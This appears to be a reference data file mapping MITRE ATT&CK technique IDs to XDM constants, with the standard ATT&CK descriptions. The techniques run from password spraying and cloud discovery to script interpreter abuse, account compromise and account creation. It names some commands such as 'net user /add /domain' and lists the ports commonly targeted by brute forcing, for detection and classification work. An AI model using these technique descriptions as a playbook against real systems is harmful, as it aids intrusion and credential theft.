T1110.002 XDM_CONST.MITRE_TECHNIQUE_BRUTE_FORCE_PASSWORD_CRACKING Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) is used to obtain password hashes; this may only get an adversary so far when [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) is not an option. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.(Citation: Wikipedia Password cracking) The plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services to which the account has access. https://attack.mitre.org/techniques/T1110/002
T1110.001 XDM_CONST.MITRE_TECHNIQUE_BRUTE_FORCE_PASSWORD_GUESSING Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver) Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. https://attack.mitre.org/techniques/T1110/001
T1110.003 XDM_CONST.MITRE_TECHNIQUE_BRUTE_FORCE_PASSWORD_SPRAYING Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying) Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following: * SSH (22/TCP) * Telnet (23/TCP) * FTP (21/TCP) * NetBIOS / SMB / Samba (139/TCP & 445/TCP) * LDAP (389/TCP) * Kerberos (88/TCP) * RDP / Terminal Services (3389/TCP) * HTTP/HTTP Management Services (80/TCP & 443/TCP) * MSSQL (1433/TCP) * Oracle (1521/TCP) * MySQL (3306/TCP) * VNC (5900/TCP) In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018) In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625. https://attack.mitre.org/techniques/T1110/003
T1612 XDM_CONST.MITRE_TECHNIQUE_BUILD_IMAGE_ON_HOST Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote build request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.(Citation: Docker Build Image) An adversary may take advantage of that build API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://attack.mitre.org/techniques/T1610) using that custom image.(Citation: Aqua Build Images on Hosts)(Citation: Aqua Security Cloud Native Threat Report June 2021) If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since it's a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. https://attack.mitre.org/techniques/T1612
T1115 XDM_CONST.MITRE_TECHNIQUE_CLIPBOARD_DATA Adversaries may collect data stored in the clipboard from users copying information within or between applications. In Windows, applications can access clipboard data by using the Windows API.(Citation: MSDN Clipboard) OSX provides a native command, pbpaste, to grab clipboard contents.(Citation: Operating with EmPyre) https://attack.mitre.org/techniques/T1115
Original Mapped Description
T1580 XDM_CONST.MITRE_TECHNIQUE_CLOUD_INFRASTRUCTURE_DISCOVERY An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services. Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries may also use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources.(Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves. https://attack.mitre.org/techniques/T1580
T1538 XDM_CONST.MITRE_TECHNIQUE_CLOUD_SERVICE_DASHBOARD An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard) Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests. https://attack.mitre.org/techniques/T1538
T1526 XDM_CONST.MITRE_TECHNIQUE_CLOUD_SERVICE_DISCOVERY An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API) Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu) https://attack.mitre.org/techniques/T1526
T1619 XDM_CONST.MITRE_TECHNIQUE_CLOUD_STORAGE_OBJECT_DISCOVERY Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure. Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure.(Citation: List Blobs) https://attack.mitre.org/techniques/T1619
T1059 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python) https://attack.mitre.org/techniques/T1059
T1059.002 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_APPLESCRIPT Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript) AppleScripts do not need to call osascript to execute, however. They may be executed from within Mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility. Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a Mach-O binary file format.(Citation: SentinelOne macOS Red Team) Since this is a scripting language, it can be used to launch more common techniques as well, such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs) https://attack.mitre.org/techniques/T1059/002
T1059.007 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_JAVASCRIPT Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS) JScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and Internet Explorer HTML Application (HTA) pages.(Citation: JScrip May 2018)(Citation: Microsoft JScript 2007)(Citation: Microsoft Windows Scripts) JavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apple's Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apple's OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apple's internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://attack.mitre.org/techniques/T1059/002). Scripts can be executed via the command line utility osascript, they can be compiled into applications or script files via osacompile, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.(Citation: Apple About Mac Scripting 2016)(Citation: SpecterOps JXA 2020)(Citation: SentinelOne macOS Red Team)(Citation: Red Canary Silver Sparrow Feb2021)(Citation: MDSec macOS JXA and VSCode) Adversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027). https://attack.mitre.org/techniques/T1059/007
T1059.008 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_NETWORK_DEVICE_CLI Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious commands and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection. (Citation: Cisco Synful Knock Evolution) https://attack.mitre.org/techniques/T1059/008
T1059.001 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_POWERSHELL Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) https://attack.mitre.org/techniques/T1059/001
T1059.006 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_PYTHON Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors. https://attack.mitre.org/techniques/T1059/006
T1059.004 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_UNIX_SHELL Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges. Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems. Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence. https://attack.mitre.org/techniques/T1059/004
T1059.005 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_VISUAL_BASIC Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads. https://attack.mitre.org/techniques/T1059/005
T1059.003 XDM_CONST.MITRE_TECHNIQUE_COMMAND_AND_SCRIPTING_INTERPRETER_WINDOWS_COMMAND_SHELL Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows) Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems. Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel. https://attack.mitre.org/techniques/T1059/003
T1092 XDM_CONST.MITRE_TECHNIQUE_COMMUNICATION_THROUGH_REMOVABLE_MEDIA Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access. https://attack.mitre.org/techniques/T1092
T1586 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_ACCOUNTS Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. A variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development; this could include filling out or modifying profile information, further developing social networks, or incorporating photos. Adversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). https://attack.mitre.org/techniques/T1586
T1586.002 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_ACCOUNTS_EMAIL_ACCOUNTS Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)). A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries can use a compromised email account to hijack existing email threads with targets of interest. https://attack.mitre.org/techniques/T1586/002
T1586.001 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_ACCOUNTS_SOCIAL_MEDIA_ACCOUNTS Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development; this could include filling out or modifying profile information, further developing social networks, or incorporating photos. Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)). https://attack.mitre.org/techniques/T1586/001
T1554 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_CLIENT_SOFTWARE_BINARY Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host. https://attack.mitre.org/techniques/T1554
T1584 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure, an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle. (Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries. (Citation: NSA NCSC Turla OilRig) https://attack.mitre.org/techniques/T1584
T1584.005 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_BOTNET Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. (Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service (Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers. (Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). https://attack.mitre.org/techniques/T1584/005
T1584.002 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_DNS_SERVER Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary. (Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server. (Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) https://attack.mitre.org/techniques/T1584/002
T1584.001 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_DOMAINS Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps. Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain. (Citation: Microsoft Sub Takeover 2020) https://attack.mitre.org/techniques/T1584/001
T1584.004 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_SERVER Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). https://attack.mitre.org/techniques/T1584/004
T1584.003 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_VIRTUAL_PRIVATE_SERVER Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves. (Citation: NSA NCSC Turla OilRig) Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party. https://attack.mitre.org/techniques/T1584/003
T1584.006 XDM_CONST.MITRE_TECHNIQUE_COMPROMISE_INFRASTRUCTURE_WEB_SERVICES Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). (Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. https://attack.mitre.org/techniques/T1584/006
T1609 XDM_CONST.MITRE_TECHNIQUE_CONTAINER_ADMINISTRATION_COMMAND Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment. (Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet) In Docker, adversaries may specify an entrypoint during container deployment that executes a script or command, or they may use a command such as docker exec to execute a command within a running container. (Citation: Docker Entrypoint)(Citation: Docker Exec) In Kubernetes, if an adversary has sufficient permissions, they may gain remote execution in a container in the cluster via interaction with the Kubernetes API server, the kubelet, or by running a command such as kubectl exec. (Citation: Kubectl Exec Get Shell) https://attack.mitre.org/techniques/T1609
T1613 XDM_CONST.MITRE_TECHNIQUE_CONTAINER_AND_RESOURCE_DISCOVERY Adversaries may attempt to discover containers and other resources that are available within a container environment. Other resources may include images, deployments, pods, nodes, and other information such as the status of a cluster. These resources can be viewed within web applications such as the Kubernetes dashboard or can be queried via the Docker and Kubernetes APIs. (Citation: Docker API)(Citation: Kubernetes API) In Docker, logs may leak information about the environment, such as the environment's configuration, which services are available, and what cloud provider the victim may be utilizing. The discovery of these resources may inform an adversary's next steps in the environment, such as how to perform lateral movement and which methods to utilize for execution. https://attack.mitre.org/techniques/T1613
T1136 XDM_CONST.MITRE_TECHNIQUE_CREATE_ACCOUNT Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system. Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection. https://attack.mitre.org/techniques/T1136
T1136.003 XDM_CONST.MITRE_TECHNIQUE_CREATE_ACCOUNT_CLOUD_ACCOUNT Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system. (Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users) Adversaries may create accounts that only have access to specific cloud services, which can reduce the chance of detection. https://attack.mitre.org/techniques/T1136/003
T1136.002 XDM_CONST.MITRE_TECHNIQUE_CREATE_ACCOUNT_DOMAIN_ACCOUNT Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services, where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account. Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system. https://attack.mitre.org/techniques/T1136/002
